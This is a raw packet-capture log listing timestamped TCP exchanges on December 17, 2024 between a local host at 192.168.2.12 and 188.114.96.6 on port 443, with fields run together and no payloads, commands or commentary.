                                                                        Dec 17, 2024 08:38:37.706295967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.706312895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.706418991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.709986925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.710005999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.710155964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.710155964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.710171938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.710244894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.872811079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.872836113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.872903109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.872919083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.872981071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.877477884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.877495050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.877625942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.877639055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.877815008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.881346941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.881365061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.881443024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.881453037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.881572962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.881572962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.886110067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.886125088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.886241913 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.886253119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.886305094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.889964104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.889981031 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.890042067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.890053034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.890081882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.890235901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.894524097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.894563913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.894658089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.894658089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.894669056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.894717932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.898272991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.898291111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.898432970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.898447990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.898499966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.902992010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.903009892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.903117895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.903117895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.903136015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.903208971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.065650940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.065679073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.065742016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.065754890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.065814018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.069266081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.069282055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.069442034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.069452047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.069555998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.074023962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.074042082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.074090004 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.074099064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.074178934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.074178934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.077855110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.077872038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.077929020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.077936888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.077975988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.078002930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.082602978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.082618952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.082665920 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.082674980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.082746983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.082746983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.087044001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.087063074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.087142944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.087151051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.087332010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.090931892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.090946913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.091154099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.091154099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.091161966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.091217995 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.095649004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.095664024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.095750093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.095750093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.095758915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.095827103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.257678986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.257714987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.257819891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.257819891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.257837057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.258424997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.261440992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.261462927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.261594057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.261607885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.261704922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.266241074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.266283035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.266319990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.266328096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.266356945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.266590118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.270081997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.270098925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.270252943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.270262957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.270437956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.274831057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.274847984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.274915934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.274924994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.274981976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.279242992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.279267073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.279299974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.279321909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.279340982 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.279366016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.283132076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.283152103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.283194065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.283202887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.283236027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.283324957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.287856102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.287882090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.287940979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.287940979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.287951946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.287988901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.449479103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.449512005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.449600935 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.449611902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.449624062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.449676991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.454122066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.454138041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.454185009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.454200029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.454248905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.454248905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.458020926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.458044052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.458100080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.458110094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.458148956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.458188057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.462779999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.462805033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.462867975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.462872982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.462934971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.466633081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.466660023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.466747046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.466747046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.466753960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.466799974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.471115112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.471136093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.471200943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.471211910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.471273899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.471273899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.474932909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.474956036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.474994898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.475001097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.475018024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.475070953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.479693890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.479716063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.479758024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.479775906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.479820013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.479820013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.641710043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.641736984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.642131090 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.642141104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.642452002 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.646409035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.646425009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.646486044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.646492004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.646538019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.646538019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.650274992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.650291920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.650562048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.650567055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.650691986 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.655014038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.655030012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.655205011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.655210018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.655329943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.658902884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.658919096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.658983946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.658988953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.659027100 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.663331032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.663348913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.663423061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.663428068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.663506985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.667134047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.667150974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.667262077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.667268038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.667704105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.671956062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.671972990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.672158957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.672167063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.672221899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.834018946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.834038973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.834119081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.834125996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.834170103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.838632107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.838648081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.838712931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.838717937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.838749886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.842541933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.842556953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.842612982 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.842617035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.842642069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.847260952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.847276926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.847352028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.847357988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.847417116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.851196051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.851212978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.851288080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.851293087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.851661921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.855573893 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.855590105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.855628967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.855639935 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.855683088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.855683088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.859554052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.859570980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.859627962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.859632969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.859720945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.864166021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.864182949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.864355087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:38.864360094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:38.864424944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.026221991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.026243925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.026351929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.026360989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.026621103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.031012058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.031028032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.031205893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.031213045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.031300068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.034754992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.034774065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.034826994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.034832954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.034956932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.039537907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.039556980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.039617062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.039623976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.039657116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.039657116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.043848038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.043865919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.043920040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.043926001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.043955088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.047835112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.047851086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.047929049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.047929049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.047934055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.048001051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.051649094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.051666975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.051785946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.051790953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.052239895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.056355953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.056371927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.056416035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.056420088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.056458950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.056458950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.218688965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.218715906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.218887091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.218904018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.218965054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.222527027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.222543955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.222651958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.222659111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.222712040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.227257013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.227277040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.227359056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.227365971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.227463007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.231117964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.231133938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.231278896 CET49716443192.168.2.12188.114.96.6
